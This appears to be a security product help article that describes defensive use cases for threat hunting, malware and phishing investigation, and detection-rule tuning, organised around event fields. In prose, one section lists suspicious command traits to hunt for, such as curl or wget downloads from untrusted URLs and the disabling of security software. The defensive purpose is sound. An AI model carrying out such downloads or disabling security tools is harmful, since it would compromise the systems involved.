Malware Analysis
Goal: Identify and investigate potential malware infections within your organization
1. Filters:
- Technique: Malware (consider using a specific malware technique if known)
- Tactics (Any or All): Delivery, Installation, Execution, Lateral Movement, Impact (depending on the desired scope)
2. Axes(Dimension mapped to timeline):
- Choose one or a combination of the following based on your investigative focus:
- "metadata.product_event_type" (to identify events related to file activity. examples of values that can be mapped to axes for analysis "file download," "file execution," "file deletion," "file modify", “process execution”)
- "target.process.command_line" (to look for suspicious process execution commands either at the time of event or subsequently after the occurence of the above event)
Look for commands that:- Attempt to disable security software (e.g., commands referencing known security software names)
- Download files from untrusted sources (e.g., commands using "wget" or "curl" to download from suspicious URLs)
- Modify system settings (e.g., commands related to registry modifications)
- Spawn new processes with suspicious arguments
- "target.process.file.sha256" (map all hash values on the timeline and look up the values around the time of interest on any Threat Intel feeds to see if they’ve a malware or suspicious file characteristics)
- "PRINCIPAL.HOSTNAME" – mapping this dimension to timeline will help you identify potentially infected/compromised hosts during the specific time of interest, as determined by the above analysis
- "target.user.userid" – map this field cross timeline to identify potentially compromised user accounts
- "security_result.threat_name" additionally mapping this dimension to axes will help you see if your security tools already detected any threats related to the suspicious activity
Inference:
- When using "metadata.product_event_type" on the axes:
- Identify a surge in events like "file download" or "file execution."
- Investigate downloaded files with suspicious characteristics. Look for events like "suspicious file hash detected" or "file downloaded from untrusted source" (potential use for "security_result.threat_name"). Analyze "target.process.file.full_path" for suspicious file names or locations.
- When using "target.process.command_line" on the axes:
- Look for suspicious commands often associated with malware, such as attempts to disable security software or download additional malicious files.
- Investigate processes with unusual command-line arguments or execution paths.
- When using "target.process.file.sha256" on the X-axis:
- Focus on specific malware hashes you suspect to be involved in an attack.
- Investigate all instances of the identified hash value. Correlate with other indicators like suspicious execution events or network connections.
- Regardless of the Axes chosen, investigate user activity following suspicious events. Look for "EVENT TYPE" related to suspicious process creation or privilege escalation attempts.
- Check for "ATT&CK TECHNIQUES" associated with the downloaded files or suspicious processes, such as "Drive-by Download" or "Remote File Transfer."
- Investigate network connections ("target.ip") following suspicious events. Look for connections to known malicious domains or command-and-control servers.
- Analyze "process.parent_process.name" to identify how suspicious processes were executed (potential malicious script or user action).
Additional Tips:
- Correlate suspicious file downloads with process execution events. Look for "target.process.file.full_path" matching downloaded files and analyze "EVENT TYPE" related to process execution (e.g., "process spawned from unknown source").
- Leverage threat intelligence feeds to identify known malware hashes and associated techniques (potential use for "security_result.threat_name").
Phishing
Goal: Identify and investigate potential phishing campaigns targeting your organization.
Filters:
- Technique: Phishing
- Tactics (Any or All): Execution, Persistence, Privilege Escalation, Defense Evasion
Axes (Dimensions):
- Choose one or a combination of the following:
- network.email.from: To identify suspicious email senders
- metadata.product_event_type: To identify user interactions with emails (e.g., "email opened", "link clicked"
- network.email.to: To identify targeted recipients
- principal.hostname: To identify potentially compromised devices
Inference:
- Identify Mass Phishing Attempts: Look for emails with the same subject line sent from various senders (network.email.from) to multiple recipients (network.email.to).
- Analyze User Interaction: Investigate if recipients from the same phishing campaign (same subject, sender) opened the emails (metadata.product_event_type: "email opened") or clicked on any links within (potential "Execution" tactic).
- Correlate User Activity with Tactics: For users who opened suspicious emails, investigate if subsequent user activity indicates tactics like Persistence (e.g., establishing remote access), Privilege Escalation (attempting to gain admin rights), or Defense Evasion (disabling security software). Look for suspicious events in "metadata.product_event_type" based on user enrichment from "network.email.to".
- Process Analysis: When user execution techniques are identified (based on tactics), investigate associated process names and parent processes to understand the potential impact and origin of the executed code.
- Threat Name Correlation: Analyze if any security controls triggered threat names ("security_result.threat_name") associated with the compromised users. This can provide additional context about the potential malware or exploit involved.
- Threat Intelligence Integration: Leverage threat intelligence feeds to identify suspicious domains or IP addresses accessed by users who interacted with phishing emails. This can help confirm malicious intent and identify broader campaign indicators.
User Compromise Detection
Scenario: A malicious actor gains unauthorized access to a legitimate user account.
Goal: Identify and investigate potential user compromise within your organization.
Filters:
- Techniques (Any or All): Focus on techniques associated with post-compromise activities, excluding those related to standard user access (e.g., Credential Access)
- Defense Evasion,
- Privilege Escalation,
- Lateral Movement,
- Impact (depending on the desired scope)
Axes:
- "EVENT TYPE" (to identify suspicious user activities) - Look for events that deviate from typical user behavior, such as:
- Failed login attempts: Especially from geographically distant locations compared to the user's usual login patterns.
- Successful logins outside of normal working hours: Investigate logins during unusual times for the specific user.
- Access to unauthorized resources: Analyze attempts to access resources not typically used by the user or outside of their designated permissions.
- Suspicious file downloads: Investigate downloads from untrusted sources or file types not typically accessed by the user.
- Process creation events: Look for creation of processes associated with suspicious file executions or privilege escalation attempts.
- Data exfiltration attempts: Identify events related to large data transfers or uploads to external locations.
- "PRINCIPAL.HOSTNAME" or "Target.user.userid" (depending on the focus)
- PRINCIPAL.HOSTNAME" (to identify potentially compromised devices): This helps you identify which devices might be compromised by analyzing the user activity originating from them.
- "target.user.userid" (to identify potentially compromised user accounts): This helps you focus on user accounts exhibiting suspicious activity patterns.
Inference:
- Look for a sequence of events suggesting a potential attack progression. This might involve:
- Failed login attempts followed by successful ones from an unusual location.
- Access to unauthorized resources or downloads of suspicious files.
- Attempts to escalate privileges or move laterally within the network.
- Correlate user/host activity with "security_result.threat_name" to identify detections by security controls related to compromised accounts. Look for alerts triggered by suspicious login attempts, privilege escalation, or malware execution.
- Investigate network connections ("target.ip") following suspicious logins or activity. Look for connections to known malicious domains or unusual outbound traffic patterns.
Additional Tips:
- Look for a combination of suspicious events rather than relying on a single indicator. A single failed login from an unusual location might not be a compromise, but multiple failed login attempts followed by a successful one could be a red flag.
- Look for a sequence of events suggesting a potential attack progression. This might involve a successful login attempt from an unusual location followed by attempts to escalate privileges, access sensitive data, or move laterally within the network.
Remember: This is a sample scenario. You can adapt the filters, axes, and inferences based on your specific security posture and needs.
By utilizing Signal Analytics' ability to analyze user activity over time and identify anomalies, you can proactively detect and investigate potential user compromise incidents, minimizing the damage caused by malicious actors.
Data engineering Use Case: Optimizing Parser
Goal: Identify and prioritize data sources (parsers) requiring improvement in MITRE ATT&CK tactic and technique mapping.
Scenario: Security data is enriched with MITRE ATT&CK framework for better threat detection and analysis. However, some data sources might not have complete mappings, resulting in events categorized as "Others" within the MITRE ATT&CK framework.
Filters:
- MITRE Technique: "Others"
(This selects events where the parser couldn't assign a specific MITRE technique)
Axes:
- Not applicable in this case (focusing on specific data sources)
Inference and Action:
- Axes to look for in Aggregated Insights:
"metadata.product_event_type" (to identify the specific event types associated with the "Others" category) - Identify the unique "metadata.product_event_type" values associated with the "Others" selection in the MITRE Technique filter. These event types represent data points where the current parser struggles to assign a specific MITRE technique.
- Generate a report highlighting the identified "metadata.product_event_type" values for the data engineering team.
- This report informs the data engineering team about specific event types where the current parser needs improvement in MITRE ATT&CK mapping.
Benefits:
- By identifying limitations in parser capabilities, you can prioritize data engineering efforts to improve the accuracy and completeness of MITRE ATT&CK mapping across different data sources.
- This leads to a more comprehensive understanding of potential threats based on the MITRE ATT&CK framework, enabling more effective threat detection and response strategies.
Additional Notes:
- This use case leverages Signal Analytics' filtering and aggregation capabilities to pinpoint specific data sources requiring improvement.
- The identified "metadata.product_event_type" values serve as actionable insights for the data engineering team to focus their efforts on enhancing parser logic and MITRE ATT&CK mapping accuracy.
Detection Engineering: Fine-tuning Detection Signals
Goal: Reduce false positives and improve the efficacy of a detection rule with a high signal volume.
Scenario: A specific detection rule in your security system is generating a large number of signals, potentially leading to alert fatigue and hindering your ability to identify real threats.
Implementation:
Data Source:
- Security event data, including rule-triggered signals.
Filters:
- Detection Rule: Focus on the specific rule with the highest number of signals.
Axes:
Choose one or a combination of the following:
- "Detection Rule Name" (to identify the detection rule generating the majority of signals)
- "Log Source" (to identify the log source generating the majority of signals)
- "metadata.eventType" (to identify the type of security event triggering the signals) - This can provide additional context about the nature of the events causing the high signal volume.
- "security.events.principal.ip" or "security.events.target.ip" (to identify specific hosts or IP addresses associated with the signals)
- "security.events.principal.user.userid" or "security.events.target.user.userid" (to identify users involved in signal generation)
Inference:
- Identify Dominant Signal Source: Analyse the "Detection Rule Name" aggregate insights on the left pane to identify the detection rule that is causing the highest number of Signals.
- Using Log Source pinpoint the log source contributing the most signals to the chosen detection rule.
- Investigate Specific Hosts/IPs/Users: If a specific source dominates, further investigate by looking at "security.events.principal.ip", "security.events.target.ip", or "security.events.principal.user.userid". This helps identify if a particular host, IP address, or user is triggering a large number of signals.
- Analyze Signal Characteristics: Within the filtered timeframe, investigate the specific events and characteristics of the generated signals. This can involve analyzing fields like:
- securityResult.threatName: To understand the potential threat category associated with the signals.
- securityResult.category: To determine the broader security risk classification.
- metadata.eventType: To identify the type of security event triggering the signals.
Action:
- Whitelisting: If the investigation reveals benign activity from specific hosts, IPs, or users that consistently trigger false positives, consider whitelisting them to exclude them from future detections by this rule.
- Rule Threshold Tuning: Based on the analysis of signal characteristics, you might need to adjust the detection rule threshold to reduce sensitivity and avoid generating signals for harmless activity. This could involve adjusting parameters related to event frequency, severity, or specific indicators within the rule logic.
- Rule Logic Refinement (Optional): In complex scenarios, further refinement of the detection rule logic might be necessary. This could involve adding additional filters or conditions to narrow down the scope of events triggering the rule and reduce false positives.
Benefits:
By fine-tuning detection signals, you can:
- Reduce alert fatigue for security analysts by focusing on high-fidelity alerts.
- Improve the effectiveness of your detection rules by minimizing false positives.
- Optimize security operations by prioritizing resources for investigating genuine threats.
Threat Hunting with Signal Analytics: Identifying Rare Events
Goal: Identify detection rules triggering on rare events that might indicate novel threats or security blind spots.
Scenario: Traditional security monitoring focuses on high-volume alerts. However, low-volume or rare events detected by specific rules can also be significant and warrant investigation.
Implementation:
- Data Source: Security event data, including rule-triggered signals.
- Filters:
-
- Low Signal Count: Focus on detection rules with the lowest number of signals within a specific time frame (e.g., past week, month).
Axes:
- Choose one or a combination of the following:
- "Detection Rule" (to identify the specific rule triggering the rare event)
- "security.events.principal.ip" or "security.events.target.ip" (to identify source or destination IPs involved)
- "security.events.principal.user.userid" or "security.events.target.user.userid" (to identify users involved)
- "metadata.eventType" (to identify the type of security event triggered)
Inference:
- Identify Rules with Rare Events: Analyze the "Detection Rule" aggregate analysis on the left pane to pinpoint rules with the least number of signals within the chosen timeframe.
- Investigate Event Details: For the identified rules, delve deeper into the specific security events triggered using the remaining Y-axis fields. This can reveal details like:
- Source and destination IP addresses (security.events.principal.ip or security.events.target.ip) to understand the attack origin or potential target.
- Usernames (security.events.principal.user.userid or security.events.target.user.userid) to identify potentially compromised accounts or unusual user activity.
- Security event type (metadata.eventType) to comprehend the nature of the detected event (e.g., failed login attempt, file access).
Action:
- Investigate the Event: Conduct a thorough investigation of the rare event. This might involve:
- Analyzing the full context of the security event, including logs from surrounding timeframes.
- Checking threat intelligence feeds for indicators of compromise (IOCs) related to the observed event.
- Investigating user behavior associated with the event (if a user is involved).
- Rule Evaluation: Depending on the investigation findings, consider:
- Updating the detection rule logic to better capture similar events in the future.
- Tuning the rule threshold to avoid missing future occurrences of the rare event.
Benefits:
- Proactive threat detection by identifying potential security blind spots through rare events.
- Improved security posture by investigating anomalies that might indicate novel threats.
- Enhanced threat intelligence by providing insights into potential new attack vectors.
Other use cases
1. Unusual Network Activity Investigation:
- Axes: Source IP, Destination IP, Destination Port
- Filter: Detection Rule: Unusual Network Behavior
- Context: Examine the network signals from a specific user or host to detect and investigate any unusual patterns, potentially indicating a security threat.
2. Insider Threat Detection:
- Axes: Principal Host, Target Host, Principal Commands, Event types, Applications accessed, File Names
- Filter: User Name
- Context: Analyze signals related to specific users accessing sensitive files on their machines, providing insights into potential insider threats.
3. Malware Spread Analysis:
- Axes: Source IP, Destination IP, File Names
- Filter: Detection Rule: Malware Propagation
- Context: Investigate the spread of malware across the network by examining the source and destination IPs along with the files involved during the detection period.
4. Threats Timeline:
- Axes: Threat types
- Filter: None
- Context: A look at what kind of threats were detected over time in the environment
Comments
0 comments
Please sign in to leave a comment.